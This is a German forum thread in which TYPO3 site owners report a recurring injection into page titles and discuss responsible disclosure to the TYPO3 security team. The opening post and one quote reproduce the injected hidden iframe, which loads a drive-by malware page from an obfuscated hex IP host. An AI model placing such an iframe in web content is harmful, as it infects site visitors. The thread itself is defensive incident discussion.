| Autor |
Nachricht |
|
Verfasst am: 16. 05. 2007 [02:26]
|
|
chupa
Themenersteller
Dabei seit: 27.07.2006
Beiträge: 24
|
Auf meiner Typo3-Seite wird immer wieder ein Seitentitel verändert; und zwar wird dort
<iframe src=http://0xcbdf9f69/google.com/AdSense.php style="display:none"></iframe>
hinter dem Text des Seitentitels eingefügt und bei Besuchern, die IE haben, versucht, irgendeinen Dreck zu installieren. Inzwischen ist das ganze das 4 mal passiert. Im Änderungslog sind keine Aktivitäten darüber zu entdecken.
Hatte jemand etwas Ähnliches schon einmal oder weiß jemand, wo ich anfangen könnte, dieses Leck abzudichten?
[Dieser Beitrag wurde 1mal bearbeitet, zuletzt am 16.05.2007 um 02:27.]
|
|
Verfasst am: 01. 06. 2007 [10:59]
|
|
jan.radecker
Dabei seit: 01.06.2007
Beiträge: 10
|
chupa schrieb:
Auf meiner Typo3-Seite wird immer wieder ein Seitentitel verändert; und zwar wird dort
<iframe src=http://0xcbdf9f69/google.com/AdSense.php style="display:none"></iframe>
hinter dem Text des Seitentitels eingefügt und bei Besuchern, die IE haben, versucht, irgendeinen Dreck zu installieren. Inzwischen ist das ganze das 4 mal passiert. Im Änderungslog sind keine Aktivitäten darüber zu entdecken.
Hatte jemand etwas Ähnliches schon einmal oder weiß jemand, wo ich anfangen könnte, dieses Leck abzudichten?
Ja, ich hatte das auch.
Da ich den Weg gefunden habe, WIE in das System eingebrochen wurde und es noch keinen Fix dafür gibt, möchte ich das noch nicht öffentlich machen.
Ich schreibe ein Privatnachricht, in der ich darauf näher eingehe.
|
|
Verfasst am: 01. 06. 2007 [12:03]
|
|
timmy2007
Dabei seit: 04.01.2007
Beiträge: 376
|
Ich würde es sehr begrüßen, wenn man diesen Sachverhalt an die Typo3-Entwickler weitergibt, da man dann darauf reagieren kann.
Es bringt nämlich nichts, das im Verborgenen zu lösen. Denn dadurch gibt es keinen Fix und andere User würden auf der Strecke bleiben.
|
|
Verfasst am: 01. 06. 2007 [12:34]
|
|
jan.radecker
Dabei seit: 01.06.2007
Beiträge: 10
|
timmy2007 schrieb:
Ich würde es sehr begrüßen, wenn man diesen Sachverhalt an die Typo3-Entwickler weitergibt, da man dann darauf reagieren kann.
Es bringt nämlich nichts, das im Verborgenen zu lösen. Denn dadurch gibt es keinen Fix und andere User würden auf der Strecke bleiben.
Ich vergaß, das hier öffentlich zu schreiben, in der Privatnachricht an chupa hatte ich das bereits erwähnt...
Ich habe die Schwachstelle sowie eine potentielle Lösung bereits gestern an das TYPO3-Security-Team gemeldet, aber noch keine Rückmeldung erhalten.
Solange kein Fix verfügbar ist, werde ich aber nicht öffentlich auf Details eingehen.
|
|
Verfasst am: 01. 06. 2007 [15:42]
|
|
enawebstudio
Dabei seit: 26.05.2007
Beiträge: 4
|
Kannst du mir bitte auch diese Informationen zusenden?
|
|
Verfasst am: 07. 06. 2007 [16:12]
|
|
humpun
Dabei seit: 01.08.2005
Beiträge: 514
|
Könntest du mir bitte die Informationen auch schicken, wir haben das gleiche Problem.
|
|
Verfasst am: 07. 06. 2007 [19:01]
|
|
nickno
Dabei seit: 20.08.2005
Beiträge: 272
|
Hallo,
ich hatte das Problem die Tage auch, als ich zufällig auf einer Kunden-Seite war. Konnte aber ebenfalls keinen Fehler in T3 ausmachen. Hast du/habt ihr eine Lösung (Hack) dafür gefunden? Wenn dem so ist, dann würde ich mich über eine kurze PM freuen.
Wenn nicht, dann würde ich dich/euch bitten, die Infos für euch zu behalten, damit die Info nicht zu weit rumgeht... Dann macht es nämlich keinen Sinn, die Schwachstelle rumzuschicken - ausser an das Security Team.
Danke&Gruß,
Tim
//edit: Rechtschraibfeder
[Dieser Beitrag wurde 1mal bearbeitet, zuletzt am 07.06.2007 um 19:02.]
|
|
Verfasst am: 08. 06. 2007 [08:38]
|
|
iHunte
Dabei seit: 18.08.2005
Beiträge: 17
|
Einige von unseren Seiten sind auch von dem Code verdreckt worden.
So wie es aussieht ist es kein Sicherheitsproblem von TYPO3 da der
"Bot" (Ich gehe jetzt mal sehr stark davon aus das ein Bot die Seiten
infiziert) bei uns auch statische Seiten infiziert hat. Dazu zählen
z.b. auch andere CMS.
Es scheint so als sei der Fehler direkt im System bzw. in einer
Systemweiten Software.
Benutzen hier alle UNIX oder gibt es hier auch jemanden der das
Problem in einer Windows Server Umgebung hat?
In a world without walls and fences - who needs Windows and Gates?
|
|
Verfasst am: 08. 06. 2007 [10:56]
|
|
nickno
Dabei seit: 20.08.2005
Beiträge: 272
|
Da ich den Weg gefunden habe, WIE in das System eingebrochen wurde und es noch keinen Fix dafür gibt, möchte ich das noch nicht öffentlich machen.
Ich schreibe ein Privatnachricht, in der ich darauf näher eingehe.
Anscheinend liegt es aber doch an Typo3... 
|
|
Verfasst am: 08. 06. 2007 [11:35]
|
|
iHunte
Dabei seit: 18.08.2005
Beiträge: 17
|
nickno schrieb:
Da ich den Weg gefunden habe, WIE in das System eingebrochen wurde und es noch keinen Fix dafür gibt, möchte ich das noch nicht öffentlich machen.
Ich schreibe ein Privatnachricht, in der ich darauf näher eingehe.
Anscheinend liegt es aber doch an Typo3...
Wieso bist Du dir da so sicher?
Ich denke aus seinem Posting geht nicht hervor welche Methode genutzt wurde um den code einzufügen. Wie ich bereits geschrieben habe sind auch statische nicht-TYPO3 Seiten davon betroffen die in keinem Zusammenhang mit den TYPO3 Systemen stehen.
In a world without walls and fences - who needs Windows and Gates?
|
Wiederholte Attacken auf Typo3-Seite
